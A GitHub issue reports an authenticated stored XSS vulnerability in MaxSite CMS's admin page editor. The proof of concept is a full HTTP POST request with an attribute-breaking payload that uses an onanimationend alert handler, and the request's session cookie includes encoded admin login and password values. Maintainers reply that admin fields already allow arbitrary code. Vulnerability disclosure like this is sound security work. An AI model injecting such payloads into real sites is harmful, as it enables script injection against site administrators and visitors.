maxsite / cms

MaxSite CMS
https://max-3000.com/
GNU General Public License v3.0
144 stars, 64 forks

Stored Cross-Site Scripting (XSS) (authenticated) #492

Closed 4xpl0r3r closed 2 years ago

4xpl0r3r commented 2 years ago

A stored cross-site scripting (XSS) vulnerability in MaxSite CMS, targeted at the web admin, through ~/admin/page_edit/4 via the parameter f_options[mso-page-content-add-class].

PoC:

[image: xss-1]

Request:

POST /admin/page_edit/4 HTTP/1.1
Host: cms-master.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------246745379914226729033108626353
Content-Length: 6433
Origin: http://cms-master.com
Connection: close
Referer: http://cms-master.com/admin/page_edit/4
Cookie: admin-menu=%7B%220%22%3A1%2C%221%22%3A1%2C%222%22%3A1%7D; cms-master.com-admin-files1=%7B%220%22%3A1%7D; ci_session=a%3A19%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%22c3c2eeae40c8eb1874cba2d2a4499a9d%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A9%3A%22127.0.0.1%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A78%3A%22Mozilla%2F5.0+%28Windows+NT+10.0%3B+Win64%3B+x64%3B+rv%3A89.0%29+Gecko%2F20100101+Firefox%2F89.0%22%3Bs%3A13%3A%22last_activity%22%3Bi%3A1648713978%3Bs%3A9%3A%22user_data%22%3Bs%3A0%3A%22%22%3Bs%3A10%3A%22userlogged%22%3Bs%3A1%3A%221%22%3Bs%3A18%3A%22last_activity_prev%22%3Bi%3A1648713976%3Bs%3A7%3A%22comuser%22%3Bi%3A0%3Bs%3A8%3A%22users_id%22%3Bs%3A1%3A%221%22%3Bs%3A9%3A%22users_nik%22%3Bs%3A5%3A%22admin%22%3Bs%3A11%3A%22users_login%22%3Bs%3A92%3A%22MSO-S5DMkA%2Ba2fEEV%2FyjtS6Hma%2FtG%2FkrmgkZpQMkgo6J4Jwm%2F%2BQ0evh5k0nxKUKxeAyo4IfESVWmmuy0wuRuFY8nkA%3D%3D%22%3Bs%3A14%3A%22users_password%22%3Bs%3A132%3A%22MSO-XCtzzQeQ0PvTtE3rvh0QRKoO5DhTMNZX5mDbcWbr7FWNWVup63AvgDI0nUi9ip9OuMRfsm3Jf6Pa%2B2X2QC%2B1cNAO3r4yA5hBf%2FzuWnHYTGxkSHwtFgtRsorvvtWC7ntm%22%3Bs%3A15%3A%22users_groups_id%22%3Bs%3A1%3A%221%22%3Bs%3A16%3A%22users_last_visit%22%3Bs%3A19%3A%222022-03-30+23%3A09%3A40%22%3Bs%3A17%3A%22users_show_smiles%22%3Bs%3A1%3A%221%22%3Bs%3A15%3A%22users_time_zone%22%3Bs%3A4%3A%227200%22%3Bs%3A14%3A%22users_language%22%3Bs%3A2%3A%22ru%22%3Bs%3A16%3A%22users_avatar_url%22%3Bs%3A0%3A%22%22%3Bs%3A11%3A%22users_email%22%3Bs%3A13%3A%22admin%40123.com%22%3B%7D09e712408d50f4a764349b1c1d165dec238c79f8; mso-tabs_widget_000=4; cms-master.com-admin-files-_pages-4-mini1=%7B%220%22%3A0%7D
Upgrade-Insecure-Requests: 1

-----------------------------246745379914226729033108626353
Content-Disposition: form-data; name="f_options[mso-page-content-add-class]"

"><style> @keyframes  x{}</style><xss style="animation-name:x" onanimationend="[].map(alert('xss'))"></xss>> <b/style=position:fixed;top:0;left:0;font-size:200px>CSS<
-----------------------------246745379914226729033108626353
Content-Disposition: form-data; name="f_submit[4]"

-----------------------------246745379914226729033108626353
Content-Disposition: form-data; name="upload_max_file_size"

20000000
-----------------------------246745379914226729033108626353
Content-Disposition: form-data; name="upload_action"

http://cms-master.com/require-maxsite/YWRtaW4vcGx1Z2lucy9hZG1pbl9wYWdlL3VwbG9hZHMtcmVxdWlyZS1tYXhzaXRlLnBocA==
-----------------------------246745379914226729033108626353
Content-Disposition: form-data; name="upload_ext"

mp3|gif|jpg|jpeg|png|svg|zip|txt|rar|doc|rtf|pdf|html|htm|css|xml|odt|avi|wmv|flv|swf|wav|xls|7z|gz|bz2|tgz

vimruler commented 2 years ago

Hmm. If someone has already gotten into the admin panel, they no longer need to hold back much and can do whatever they like with the site right away, not just XSS against the site's visitors :))

Still, overall an interesting piece of research, thanks!

maxsite commented 2 years ago

What's more, meta fields like these are often intended precisely for placing arbitrary code there.